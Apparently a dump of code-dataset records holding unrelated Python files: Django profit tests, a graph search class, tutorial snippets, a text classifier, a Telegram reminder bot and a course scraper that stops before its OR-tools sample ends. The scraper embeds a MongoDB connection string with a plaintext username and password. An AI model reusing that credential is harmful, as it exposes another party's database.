self.assertIn('specs', res.context)\n self.assertTrue(type(res.context['specs']), dict())\n\n self.assertIn('pspecs_with_profit', res.context['specs'])\n self.assertIn('pspecs_no_profit', res.context['specs'])\n specs_profit = res.context['specs']['pspecs_with_profit']\n specs_not_profit = res.context['specs']['pspecs_no_profit']\n kw18 = kw132 = None\n\n for sp in specs_profit:\n if round(sp['power']) == 132:\n kw132 = sp\n elif round(sp['power'], 1) == 18.5:\n kw18 = sp\n self.assertEqual(kw132['power'], 132)\n self.assertEqual(round(kw132['profit'], 1), 120533012.00)\n self.assertEqual(round(kw132['percent'], 2), 13.71)\n self.assertEqual(round(kw18['power'], 1), 18.5)\n self.assertEqual(round(kw18['profit'], 1), 30185024.80)\n self.assertEqual(round(kw18['percent'], 2), 23.25)\n self.assertEqual(len(specs_profit), 2)\n 
self.assertEqual(len(specs_not_profit), 1)\n\n    def test_proforma_profit_path_context_has_proforma_object(self):\n        self.client.force_login(self.superuser)\n        self.prepare_prof_routine_not_routine_specs()\n        proforma = ProformaFactory.create()\n\n        url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n        res = self.client.get(url)\n\n        self.assertIn('prof', res.context)\n        self.assertEqual(res.context['prof'].pk, proforma.pk)\n\n    def test_proforma_profit_path_context_has_file_date(self):\n        cost_file_name = \"20201002\"\n        cost_file_date_fa = helpers.get_date_fa_from_file_name(cost_file_name)\n        self.client.force_login(self.superuser)\n        self.prepare_prof_routine_not_routine_specs()\n        proforma = ProformaFactory.create()\n\n        url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n        res = self.client.get(url)\n\n        self.assertIn('cost_file', res.context)\n        self.assertIn('name', res.context['cost_file'])\n        self.assertIn('date_fa', res.context['cost_file'])\n        self.assertEqual(res.context['cost_file']['name'], cost_file_name)\n        self.assertEqual(res.context['cost_file']['date_fa'], cost_file_date_fa)\n\n    def test_prof_profit_post_discount(self):\n        self.client.force_login(self.superuser)\n        prof = factories.ProformaFactory.create(number=153)\n        factories.ProformaSpecFactory.create(xpref_id=prof, price=1000000000, kw=132, rpm=1500, qty=3)\n        factories.ProformaSpecFactory.create(xpref_id=prof, price=500000000, kw=90, rpm=1500, qty=2)\n        url = reverse('prof_profit', kwargs={'ypref_pk': prof.pk})\n        post_data = {\n            'un90_disc': 10,\n            'up90_disc': 15\n        }\n        res = self.client.post(url, data=post_data)\n        discount = {\n            'lte__90': 10,\n            'gt__90': 15,\n        }\n        self.assertIn('discount', res.context)\n        self.assertDictEqual(res.context['discount'], discount)\n        self.assertEqual(res.context['proforma']['price'], 3450000000)\n\n    def test_materials_cost_for_prof_profit(self):\n        self.client.force_login(self.superuser)\n        proforma = ProformaFactory.create()\n        url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n        res = self.client.get(url)\n        self.assertIn('material_cost', res.context)\n        self.assertEqual(res.context['material_cost']['silicon'], 330000)\n        self.assertEqual(res.context['material_cost']['cu'], 2100000)\n        self.assertEqual(res.context['material_cost']['dicast'], 220000)\n        self.assertEqual(res.context['material_cost']['steel'], 150000)\n        self.assertEqual(res.context['material_cost']['alu'], 500000)\n\n    def test_adjust_materials_cost_prof_profit_post(self):\n        proforma = ProformaFactory.create()\n        self.client.force_login(self.superuser)\n        self.prepare_prof_routine_not_routine_specs()\n        discount_payload = {\n            'lte__90': 0,\n            'gt__90': 0,\n        }\n        # numeric material prices posted alongside the discounts\n        materials_payload = {\n            \"silicon\": 300000,\n            \"cu\": 2100000,\n            \"alu\": 500000,\n            \"steel\": 150000,\n            \"dicast\": 220000,\n        }\n        payload = dict()\n        payload.update(discount_payload)\n        payload.update(materials_payload)\n\n        url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n        res = self.client.post(url, data=payload)\n\n        self.assertDictEqual(res.context['material_cost'], materials_payload)\n\n        specs_profit = res.context['specs']['pspecs_with_profit']\n        specs_not_profit = res.context['specs']['pspecs_no_profit']\n        kw18 = kw132 = None\n\n        for sp in specs_profit:\n            if round(sp['power']) == 132:\n                kw132 = sp\n            elif round(sp['power'], 1) == 18.5:\n                kw18 = sp\n        self.assertEqual(kw132['power'], 132)\n        
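# the expected profit/percent figures below assume the adjusted material prices posted above\n        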
self.assertEqual(round(kw132['profit'], 1), 146069012.00)\n self.assertEqual(round(kw132['percent'], 2), 17.11)\n self.assertEqual(round(kw18['power'], 1), 18.5)\n self.assertEqual(round(kw18['profit'], 1), 33410624.80)\n self.assertEqual(round(kw18['percent'], 2), 26.39)\n self.assertEqual(len(specs_profit), 2)\n self.assertEqual(len(specs_not_profit), 1)\n\n def test_current_profit_sets_today_in_session(self):\n proforma = ProformaFactory.create()\n self.client.force_login(self.superuser)\n\n today = jdatetime.date.today()\n\n url = reverse('current_profit', kwargs={'ypref_pk': proforma.pk})\n response = self.client.get(url)\n self.assertEqual(\n self.client.session.get('current_profit_date'),\n str(today)\n )\n self.assertRedirects(\n response=response,\n expected_url=reverse('prof_profit', kwargs={'ypref_pk': proforma.pk}),\n status_code=status.HTTP_302_FOUND,\n target_status_code=status.HTTP_200_OK\n )\n\n def test_current_profit_picks_today_date(self):\n self.client.force_login(self.superuser)\n\n prof_date = jdatetime.date(year=1399, month=3, day=6) # file: 1399-02-14:20200503\n proforma = ProformaFactory.create()\n proforma.date_fa = prof_date\n proforma.save()\n\n today = jdatetime.date.today()\n\n session = self.client.session\n session.update({\n 'current_profit_date': str(today),\n })\n session.save()\n\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n response = self.client.get(url)\n self.assertEqual(response.context['prof'].date_fa, proforma.date_fa)\n self.assertNotIn('current_profit_date', self.client.session)\n self.assertEqual(response.context['prof'], proforma)\n self.assertEqual(response.context['cost_file']['name'], \"20201102\")\n\n @prevent_request_warnings\n def test_total_profit_fails_no_permission(self):\n url = reverse('total_profit')\n self.client.force_login(self.user)\n res = self.client.get(url)\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n\n @prevent_request_warnings\n def test_total_profit_fails_with_exp_user(self):\n self.client.force_login(self.user)\n url = reverse('total_profit')\n res = self.client.get(url)\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_total_profit_success_with_superuser(self):\n self.client.force_login(self.superuser)\n url = reverse('total_profit')\n res = self.client.get(url)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n def test_perms(self):\n self.client.force_login(self.superuser)\n PrefSpec.objects.all().delete()\n Xpref.objects.all().delete()\n\n BaseProformaFactories().base_proformas()\n\n url = reverse('total_profit')\n response = self.client.get(url)\n self.assertEqual(response.context['proforma_count'], 0)\n self.assertEqual(round(response.context['cost'], 2), 0)\n self.assertEqual(round(response.context['price'], 2), 0)\n self.assertEqual(round(response.context['profit'], 2), 0)\n self.assertEqual(response.context['percent'], None)\n\n def test_total_profit(self):\n self.client.force_login(self.superuser)\n PrefSpec.objects.all().delete()\n Xpref.objects.all().delete()\n\n BaseProformaFactories().base_proformas()\n Xpref.objects.update(perm=True)\n\n prof1 = factories.ProformaFactory.create(number=155)\n date_str = '20201014'\n date = helpers.get_date_from_date_str(date_str)\n date_fa = jdatetime.date.fromgregorian(date=date, locale='fa_IR')\n prof1.date_fa = date_fa\n prof1.perm = False\n prof1.save()\n factories.ProformaSpecFactory.create(xpref_id=prof1, price=160000000, kw=18.5, rpm=3000, qty=1)\n 
factories.ProformaSpecFactory.create(xpref_id=prof1, price=1000000000, kw=132, rpm=1500, qty=2)\n\n url = reverse('total_profit')\n response = self.client.get(url)\n self.assertIn('cost', response.context)\n self.assertIn('price', response.context)\n self.assertIn('profit', response.context)\n self.assertIn('percent', response.context)\n\n self.assertEqual(response.context['proforma_count'], 3)\n self.assertEqual(round(response.context['cost'], 2), 4784590556.00)\n self.assertEqual(round(response.context['price'], 2), 5400000000.00)\n self.assertEqual(round(response.context['profit'], 2), 615409444.00)\n self.assertEqual(round(response.context['percent'], 2), 12.86)\n","sub_path":"app/request/tests/non_api/cost/test_cost.py","file_name":"test_cost.py","file_ext":"py","file_size_in_byte":13507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"537618176","text":"from stack_array import * # Needed for Depth First Search\nfrom queue_array import * # Needed for Breadth First Search\n\n\nclass Vertex:\n '''Add additional helper methods if necessary.'''\n def __init__(self, key):\n '''Add other attributes as necessary'''\n self.id = key\n self.adjacent_to = []\n self.flag = False\n self.rb = \"red\"\n\n def add_adj(self, vertex):\n self.adjacent_to.append(vertex)\n\n def get_adj(self):\n return self.adjacent_to\n\n def get_flag(self):\n return self.flag\n\n def set_flag(self, tf):\n self.flag = tf\n\n def set_rb(self, rb):\n self.rb = rb\n\n def get_rb(self):\n return self.rb\n\n\nclass Graph:\n '''Add additional helper methods if necessary.'''\n def __init__(self, filename):\n '''reads in the specification of a graph and creates a graph using an adjacency list representation. \n You may assume the graph is not empty and is a correct specification. E.g. each edge is \n represented by a pair of vertices. Note that the graph is not directed so each edge specified \n in the input file should appear on the adjacency list of each vertex of the two vertices associated \n with the edge.'''\n self.graph = {}\n\n specs = open(filename, \"r\")\n data = specs.read()\n specs.close()\n\n lines = data.split(\"\\n\")\n for line in lines:\n words = line.split(\" \")\n\n for k in range(len(words)):\n if words[k] != \"\":\n self.add_vertex(words[k])\n\n if k % 2 == 1:\n self.add_edge(words[0], words[1])\n\n def add_vertex(self, key):\n '''Add vertex to graph, only if the vertex is not already in the graph.'''\n if key not in self.graph:\n vertex = Vertex(key)\n self.graph[key] = vertex\n\n def get_vertex(self, key):\n '''Return the Vertex object associated with the id. If id is not in the graph, return None'''\n if key in self.graph:\n return self.graph[key]\n else:\n return None\n\n def add_edge(self, v1, v2):\n '''v1 and v2 are vertex id's. As this is an undirected graph, add an \n edge from v1 to v2 and an edge from v2 to v1. You can assume that\n v1 and v2 are already in the graph'''\n self.get_vertex(v1).add_adj(v2)\n self.get_vertex(v2).add_adj(v1)\n\n def get_vertices(self):\n '''Returns a list of id's representing the vertices in the graph, in ascending order'''\n sort_keys = sorted(self.graph)\n return sort_keys\n\n def conn_components(self): \n '''Returns a list of lists. For example, if there are three connected components \n then you will return a list of three lists. 
Each sub list will contain the \n vertices (in ascending order) in the connected component represented by that list.\n The overall list will also be in ascending order based on the first item of each sublist.\n This method MUST use Depth First Search logic!'''\n\n self.set_false()\n\n stack = Stack(len(self.graph))\n comp_tot = []\n\n for i in self.graph:\n if not self.get_vertex(i).get_flag():\n stack.push(i)\n self.get_vertex(i).set_flag(True)\n comp_tot.append(sorted(self.conn_helper(stack, [], i)))\n\n return sorted(comp_tot)\n\n def conn_helper(self, stack, compound, temp):\n\n compound.append(temp)\n\n while not stack.is_empty():\n for k in self.graph[temp].get_adj():\n\n if not self.graph[k].get_flag():\n self.get_vertex(k).set_flag(True)\n stack.push(k)\n self.conn_helper(stack, compound, k)\n\n if not stack.is_empty():\n stack.pop()\n\n return compound\n\n def set_false(self):\n for i in self.graph:\n self.get_vertex(i).set_flag(False)\n\n def is_bipartite(self):\n '''Returns True if the graph is bicolorable and False otherwise.\n This method MUST use Breadth First Search logic!'''\n\n self.set_false()\n\n queue = Queue(len(self.graph))\n temp_flag = True\n\n for i in self.graph:\n if not self.get_vertex(i).get_flag():\n self.get_vertex(i).set_rb(\"black\")\n self.get_vertex(i).set_flag(True)\n queue.enqueue(i)\n temp_flag = self.bipart_helper(queue)\n\n if not temp_flag:\n break\n\n return temp_flag\n\n def bipart_helper(self, queue):\n\n ef = True\n\n while not queue.is_empty():\n temp = queue.dequeue()\n temp_l = self.graph[temp].get_adj()\n\n for i in temp_l:\n if not self.graph[i].get_flag():\n self.graph[i].set_flag(True)\n queue.enqueue(i)\n\n if self.graph[temp].get_rb() == \"black\":\n self.graph[i].set_rb(\"red\")\n else:\n self.graph[i].set_rb(\"black\")\n\n elif self.graph[temp].get_rb() == self.graph[i].get_rb():\n ef = False\n\n if not ef:\n break\n\n return ef\n","sub_path":"p5-hegglinmichael/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"173550717","text":"def evenOdd (x):\r\n if x % 2 == 0:\r\n print('even')\r\n else:\r\n print('odd')\r\n\r\n# driver code\r\nevenOdd(53)\r\nevenOdd(12)\r\n\r\n#%% Pass by reference \r\n'''\r\nin Python every variable name is a reference. \r\nWhen we pass a variable to a function, a new reference to the object is created.\r\n'''\r\ndef myFun(x):\r\n x[0] = 20\r\n \r\n# Driver Code (Note that lst is modified \r\n# after function call. \r\nlst = [10, 11, 12, 13, 14, 15] \r\nmyFun(lst); \r\nprint(lst)\r\n\r\n#%%\r\ndef myFun(x): \r\n \r\n # After below line link of x with previous \r\n # object gets broken. A new object is assigned \r\n # to x. \r\n x = [20, 30, 40] \r\n \r\n# Driver Code (Note that lst is not modified \r\n# after function call. \r\nlst = [10, 11, 12, 13, 14, 15] \r\nmyFun(lst); \r\nprint(lst) \r\n\r\n#%%\r\ndef myFun(x): \r\n \r\n # After below line link of x with previous \r\n # object gets broken. A new object is assigned \r\n # to x. \r\n x = 20\r\n \r\n# Driver Code (Note that lst is not modified \r\n# after function call. 
\r\nx = 10 \r\nmyFun(x); \r\nprint(x)\r\n\r\n#%% SWAP -------\r\n\r\ndef swap(x,y):\r\n temp = x\r\n x = y;\r\n y = temp\r\n \r\n#DRiver code \r\nx = 2; y = 3\r\nswap(x,y)\r\nprint(x); print(y)\r\n\r\n#%% default argument\r\n'''\r\nonce we have a default argument, all the arguments to its \r\nright must also have default values.'''\r\n\r\ndef myFun(x, y=50): \r\n print(\"x: \", x) \r\n print(\"y: \", y) \r\n \r\n# Driver code (We call myFun() with only \r\n# argument) \r\nmyFun(10)\r\n\r\n#%% keyword Arguments\r\ndef student(firstname, lastname):\r\n print(firstname, lastname)\r\n\r\n\r\n# Keyword arguments \r\nstudent(firstname ='Geeks', lastname ='Practice') \r\nstudent(lastname ='Practice', firstname ='Geeks')\r\n\r\n#%% Variable Length arguments\r\n# *args for variable number of arguments \r\n\r\ndef myFun(*argv):\r\n for arg in argv:\r\n print(arg)\r\n \r\nmyFun('Hello', 'Welcome', 'to', 'GeeksforGeeks') \r\n\r\n#%% \r\n## *kargs for variable number of keyword arguments\r\n\r\ndef myFun(**kwargs): \r\n for key, value in kwargs.items(): \r\n print (\"%s == %s\" %(key, value)) \r\n \r\n# Driver code \r\nmyFun(first ='Geeks', mid ='for', last='Geeks')\r\n\r\n#%%\r\n# lambda is used to create anonymous functions\r\n\r\ncube = lambda x : x*x*x\r\nprint(cube(7))\r\n\r\n \r\n \r\n","sub_path":"Programming_basics/7_Functions/Ex1_basics.py","file_name":"Ex1_basics.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"483429813","text":"import sys\nimport numpy as np\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn.metrics import fbeta_score, make_scorer\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.multioutput import MultiOutputClassifier\nimport pickle\nimport nltk\nnltk.download('punkt')\nnltk.download('wordnet')\nfrom typing import Tuple, List\n\n\ndef load_data(database_filepath: str) -> Tuple[pd.DataFrame, pd.DataFrame, List[str]]:\n \"\"\" Function to load the database into pandas DataFrame\n Args: database_filepath: Path for the database\n database_filename: Name for the database\n Returns: X: features (messages)\n y: categories\n An ordered list of categories\n \"\"\"\n # Loading database into pandas DataFrame\n \n engine = create_engine('sqlite:///{}'.format(database_filepath))\n df = pd.read_sql(\"SELECT * FROM disaster\", engine)\n\n # Creating DataFrame for x variables\n X = df['message']\n\n # Creating DataFrame for y variables\n y = df.drop(['id', 'message', 'original', 'genre'], axis=1).astype(float)\n categories = y.columns.values\n return X, y, categories \n\n\ndef tokenize(text: str) -> List[str]:\n \"\"\" Function to tokenize text\n Args: Text\n Returns: List of tokens\n \"\"\"\n tokens = nltk.word_tokenize(text)\n lemmatizer = nltk.WordNetLemmatizer()\n return [lemmatizer.lemmatize(w).lower().strip() for w in tokens]\n\n\ndef build_model()->GridSearchCV:\n \"\"\" Function to build pipeline and GridSearch\n Args: None\n Returns: Model\n \"\"\"\n # Pipeline for transforming data, fitting to model and predict the model\n pipeline = Pipeline([\n ('cvect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', RandomForestClassifier())\n ])\n\n # Parameters for 
GridSearch \n    parameters = {\n        'clf__n_estimators': [20, 40, 60],\n        'clf__max_depth': [5, 10, None],\n        'clf__min_samples_leaf': [2, 4, 5],\n        'clf__min_samples_split': [2, 5, 10],\n    }\n\n    # GridSearch with parameters above\n    cv = GridSearchCV(pipeline, param_grid = parameters, scoring='f1_micro', verbose=1, n_jobs=1)\n\n    return cv  # hand back the grid search so main() trains with hyperparameter tuning\n\n\ndef evaluate_model(model: GridSearchCV, X_test: pd.DataFrame, y_test: pd.DataFrame, category_names: List)->None:\n    \"\"\" Function to evaluate model by printing a classification report\n\n    Args: model, features, labels to evaluate, and a list of categories\n    Returns: Classification report\n    \"\"\"\n    y_pred = model.predict(X_test)\n    print(classification_report(y_test, y_pred, target_names=category_names)) \n    \n\n\n\ndef save_model(model: GridSearchCV, model_filepath: str)-> None:\n    \"\"\" Function to save the model as pickle file\n    Args: Model, filepath\n    Returns: None\n    \"\"\"\n    with open(model_filepath, 'wb') as file:\n        pickle.dump(model, file)\n    \n\ndef main():\n    if len(sys.argv) == 3:\n        database_filepath, model_filepath = sys.argv[1:]\n        print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n\n        X, y, category_names = load_data(database_filepath)\n        X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\n        print('Building model...')\n        model = build_model()\n\n        print('Training model...')\n        model.fit(X_train, y_train)\n\n        print('Evaluating model...')\n        evaluate_model(model, X_test, y_test, category_names)\n\n        print('Saving model...\\n MODEL: {}'.format(model_filepath))\n        save_model(model, model_filepath)\n\n        print('Trained model saved!')\n    else:\n        print('Please provide the filepath of the disaster messages database '\\\n              'as the first argument and the filepath of the pickle file to '\\\n              'save the model to as the second argument. \\n\\nExample: python '\\\n              'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n    main()","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"303361812","text":"# -*- coding: utf-8 -*-\nfrom app import app\nfrom app.config import token # Grab the token from config.py (that file holds a token variable whose value is issued by BotFather in Telegram)\nfrom app.db_postgresql import SQL_Postgre\nfrom app.csvEditor import csv_dict_reader\nfrom app.ExchangeRates import current_exchange_rate\nimport os\nimport telebot\nfrom flask import request\nfrom app.timezone import get_utc_offset_timezone, get_time_from_another_timezone\nimport requests\nimport datetime\nimport time\nimport threading\n\n\nbot = telebot.TeleBot(token)\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n    # You can do it like this\n    # user = bot.get_me().__dict__['first_name']\n    # Or like this\n    botName = bot.get_me().first_name # Get the bot's name\n    userName = message.from_user.first_name # Get the user's name\n    chat_id = message.chat.id\n    # Greeting\n\n\n\n    '''\n    Validate the client in the system\n    '''\n\n    # Collect the data\n    userId = message.from_user.id # the user's id in Telegram\n    # Is the sender a bot? The documentation provides is_bot\n    firstName = message.from_user.first_name # The user's first name\n    userName = message.from_user.username # The name displayed in Telegram\n    lastName = message.from_user.last_name # The user's last name\n    languageCode = message.from_user.language_code # The language in use\n    msg_date = message.date # When /start was sent\n\n\n    db = SQL_Postgre()\n    # check_user_availible = True  - the user exists in the system\n    #                      = False - the user does not exist in the system\n    check_user_availible = db.check_user_id(userId)\n    if check_user_availible == False:\n        curr_utc_time = datetime.datetime.utcnow()\n        timezone = get_utc_offset_timezone(curr_utc_time, msg_date)\n        a = db.new_user(userId,firstName,userName,lastName,timezone)\n        db.close()\n        # After registering the client in the system, send the first greeting\n        bot.send_message(message.chat.id, userName + \", hello! My name is \" + botName + \". I am your personal assistant.\nSubscribe to my services and you will receive notifications every morning.\")\n        list_subscriptions = \"To subscribe to a service, tap it or write to me: \\n/time - date and time\\n/weather - today's weather\\n/currency - exchange rates\\n/contact - birthday notifications\"\n        bot.send_message(message.chat.id, list_subscriptions)\n        list_commands = \"You can also use these commands: \\n/time - current time\\n/contacts - manage contacts\\n/currency - exchange rates\"\n        bot.send_message(message.chat.id, list_commands)\n\n    else:\n        db.close()\n        bot.send_message(message.chat.id, userName + \", hello! My name is \" + botName + \". How can I help?\")\n        list_subscriptions = \"/currentSubscriptions - current subscriptions\"\n        bot.send_message(message.chat.id, list_subscriptions)\n        list_commands = \"Command list: \\n/time - current time\\n/contacts - manage contacts\\n/currency - exchange rates\"\n        bot.send_message(message.chat.id, list_commands)\n\n\n@bot.message_handler(commands=['time'])\ndef send_time_now(message):\n    currDTime = datetime.datetime.fromtimestamp(message.date)\n    bot.send_message(message.chat.id, 'Today is {:%d %b %Y, %H:%M} '.format(currDTime))\n\n@bot.message_handler(commands=['contacts'])\ndef send_welcome_contacts(message):\n    bot.send_message(message.chat.id, \"Command list:\\n /createContact - upload contacts from a file\")\n\n@bot.message_handler(func=lambda message: True, commands=['createContact'])\ndef new_contact_list(message):\n    bot.send_message(message.chat.id, 'Please upload a file in GOOGLE CSV format\\nDetails: https://www.google.com/contacts/u/0/?cplus=0#contacts\\nMore->Export->Choose the export file format->\\\n    Google CSV (for importing into a Google account)')\n\n# Document upload\n@bot.message_handler(content_types=['document'])\ndef downloadFile(message):\n    userId = message.from_user.id\n    a = message.document.file_id\n    file_info = bot.get_file(a)\n    file = requests.get('https://api.telegram.org/file/bot{0}/{1}'.format(token, file_info.file_path))\n    csv_dict_reader(file.text, userId)\n    bot.send_message(message.chat.id, \"File uploaded successfully.\")\n\n@bot.message_handler(commands=['currency'])\ndef send_exchange_rates(message):\n    dollar,euro = current_exchange_rate()\n    bot.send_message(message.chat.id, \"Today's exchange rates:\\n USD: \" + str(dollar) +\"\\n EUR: \" + str(euro))\n\n\ndef start_contact_notification():\n    thread = threading.Thread(target=run_thread)\n    thread.start()\n\n\ndef run_thread():\n    time_notice_h = 9 # Notifications are statically sent to the user at 9:00 in the morning\n    time_notice_m = 0 # 0 minutes\n    while True:\n        current_date = datetime.date.today() # Get the current date\n        current_time = datetime.datetime.utcnow() # Get the server's current time in UTC (+00 on the server)\n        for utc in range(-12,12): # iterate over all time zones\n            if current_time.hour + utc == time_notice_h and current_time.minute == time_notice_m: # The notification is statically set to 9:00 for now (once deployed, the server will send it at 9:00 server time)\n                '''\n                For example: the user is in Moscow. We obtained their time zone when /start ran (first launch of the bot). Their UTC offset is +3.\n                Server time current_time.hour = 6 in the morning\n                Client time is 9 in the morning\n                If server time + the client's time zone == 9:00 sharp, we proceed\n                '''\n                db = SQL_Postgre()\n                data_contact_withTimeZone = db.get_user_timezone(utc) # Get the ids of users whose time zone is utc\n                for currData in data_contact_withTimeZone:\n                    data_contact = db.find_data_contact(current_date.month, current_date.day, currData[0]) # Get the contact data for those ids\n                    if len(data_contact) != 0: # If the data is not empty\n                        for row in data_contact:\n                            bot.send_message(row[2], 'Birthday today: ' + str(row[0]) + ' ' + str(row[1]) )\n                db.close()\n        time.sleep(60) # Run again in a minute\n\n\n# Start a new thread that checks every day who needs notifications from the contacts DB\nstart_contact_notification()\n\n\n\n#!------------------------------------------------------------------------------------------!#\n# SERVER PART (DO NOT TOUCH)\n#!------------------------------------------------------------------------------------------!#\n\"\"\"\n@app.route('/' + token, methods=['POST'])\ndef get_message():\n    bot.process_new_updates([telebot.types.Update.de_json(request.stream.read().decode(\"utf-8\"))])\n    return \"POST\", 200\n\n\n@app.route(\"/\")\ndef web_hook():\n    bot.remove_webhook()\n    bot.set_webhook(url='https://miass-bot.herokuapp.com/' + token)\n    return \"CONNECTED\", 200\n\"\"\"\n#app.run(host=\"0.0.0.0\", port=os.environ.get('PORT', 5000)) - we do not need this, because we run the command: gunicorn runp-heroku:app\n\n# If the web hooks do not work, or you want to run on a local machine,\n# comment out the server part and enable bot.polling\n\n# Enable this if the web hooks are not working\n\n# If the error \"Conflict: can\\'t use getUpdates method while webhook is active\" appears, change the bot token\n# Message @botFather\n# /revoke\n#\n# /MiassSuperBot\n\n# or\n# heroku ps:scale web=0 #! Stop the server\n# Telegram will flush the hooks\n# heroku ps:scale web=1 #! Start the server\n\n\n# or run bot.remove_webhook()\nbot.remove_webhook()\nbot.polling(none_stop=True)\n\n\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"411419186","text":"from selenium.webdriver import Chrome\nfrom selenium.common.exceptions import NoSuchElementException\nfrom pymongo import MongoClient\n\ndef Scrape_Futurelearn():\n\t#Set up MongoDB client\n\tdb_client = MongoClient('mongodb+srv://jonesca7:tohacks2020@coursehub-8qtyk.gcp.mongodb.net/test?retryWrites=true&w=majority')\n\tdb = db_client.CourseList #Select database \n\tcollection = db.collection #Create collection called Coursera \n\n\twebdriver = \"chromedriver.exe\"\n\tdriver = Chrome(webdriver)\n\n\turl = \"https://www.classcentral.com/report/futurelearn-free-certificates/\"\n\tdriver.get(url)\n\n\tcourse_list = []\n\tcourses = driver.find_elements_by_xpath(\"//section/div/ul/li\")\n\tfor course in courses:\n\t\tcourse_title = course.find_element_by_xpath(\"a\").text\n\n\t\ttry:\n\t\t\tcourse_platform = course.find_element_by_xpath(\"em\").text\n\t\texcept NoSuchElementException:\n\t\t\tcourse_platform = \"Unknown\"\n\n\t\tcourse_url = course.find_element_by_xpath(\"a\").get_attribute(\"href\")\n\t\n\t\tcourse_object = {\"name\" : course_title, \"topic\" : \"N/A\", \"platform\" : course_platform, \"url\" : course_url}\n\t\tcourse_list.append(course_object)\n\n\tcollection.insert_many(course_list)\n\n\tdriver.close()","sub_path":"futurelearn.py","file_name":"futurelearn.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"142800400","text":"# https://developers.google.com/optimization/assignment/assignment_groups\nfrom ortools.sat.python import cp_model\n\n\ndef main():\n    # Model\n    model = cp_model.CpModel()\n\n    # Create data\n    # each worker is in a row and each task is in a column\n    costs = [[90, 76, 75, 70, 50, 74],\n             [35, 85, 55, 65, 48, 101],\n             [125, 95, 90, 105, 59, 120],\n             [45, 110, 95, 115, 104, 83],\n             [60, 105, 80, 75, 59, 62],\n             [45, 65, 110, 95, 47, 31],\n             [38, 51, 107, 41, 69, 99],\n             [47, 85, 57, 71, 92, 77],\n             [39, 63, 97, 49, 118, 56],\n             [47, 101, 71, 60, 88, 109],\n             [17, 39, 103, 64, 61, 92],\n             [101, 45, 83, 59, 92, 27]]\n    num_workers = len(costs)\n    num_tasks = len(costs[0])\n\n    group1 = [[0, 0, 1, 1], # Workers 2, 3\n              [0, 1, 0, 1], # Workers 1, 3\n              [0, 1, 1, 0], # Workers 1, 2\n              [1, 1, 0, 0], # Workers 0, 1\n              [1, 0, 1, 0]] # Workers 0, 2\n\n    group2 = [[0, 0, 1, 1], # Workers 6, 7\n              [0, 1, 0, 1], # Workers 5, 7\n              [0, 1, 1, 0], # Workers 5, 6\n              [1, 1, 0, 0], # Workers 4, 5\n              [1, 0, 0, 1]] # Workers 4, 7\n\n    group3 = [[0, 0, 1, 1], # Workers 10, 11\n              [0, 1, 0, 1], # Workers 9, 11\n              [0, 1, 1, 0], # Workers 9, 10\n              [1, 0, 1, 0], # Workers 8, 10\n              [1, 0, 0, 1]] # Workers 8, 11\n\n    # Create the variables\n    x = {}\n    for i in range(num_workers):\n        for j in range(num_tasks):\n            x[i, j] = model.NewBoolVar(f'x[{i},{j}]')\n\n    # Create a linear constraint\n    # Each worker is assigned to at most one task.\n    [model.Add(sum(x[i, j] for j in range(num_tasks)) <= 1) for i in range(num_workers)]\n\n    # Each task is assigned to exactly one worker.\n    [model.Add(sum(x[i, j] for i in range(num_workers)) == 1) for j in range(num_tasks)]\n\n    # Create variables for each worker, indicating whether they work on some task.\n    workers = []\n    for i in range(num_workers):\n        
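# indicator for \"worker i received at least one task\"; linked to the assignment vars just below\n        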
workers.append(model.NewBoolVar(f'worker{i}'))\n\n for i in range(num_workers):\n model.Add(workers[i] == sum(x[i, j] for j in range(num_tasks)))\n\n # Define the allowed groups of worders\n model.AddAllowedAssignments([workers[0], workers[1], workers[2], workers[3]], group1)\n model.AddAllowedAssignments([workers[4], workers[5], workers[6], workers[7]], group2)\n model.AddAllowedAssignments([workers[8], workers[9], workers[10], workers[11]], group3)\n\n # Create the objective function\n objective_terms = []\n for i in range(num_workers):\n for j in range(num_tasks):\n objective_terms.append(costs[i][j] * x[i, j])\n model.Minimize(sum(objective_terms))\n\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n\n if status == cp_model.OPTIMAL:\n print(f'Total cost = {solver.ObjectiveValue()}')\n for i in range(num_workers):\n for j in range(num_tasks):\n if solver.BooleanValue(x[i, j]):\n print(f' Worker {i} assigned to task {j}. Cost = {costs[i][j]}')\n else:\n print('No solution found.')\n\n\nif __name__ == '__main__':\n 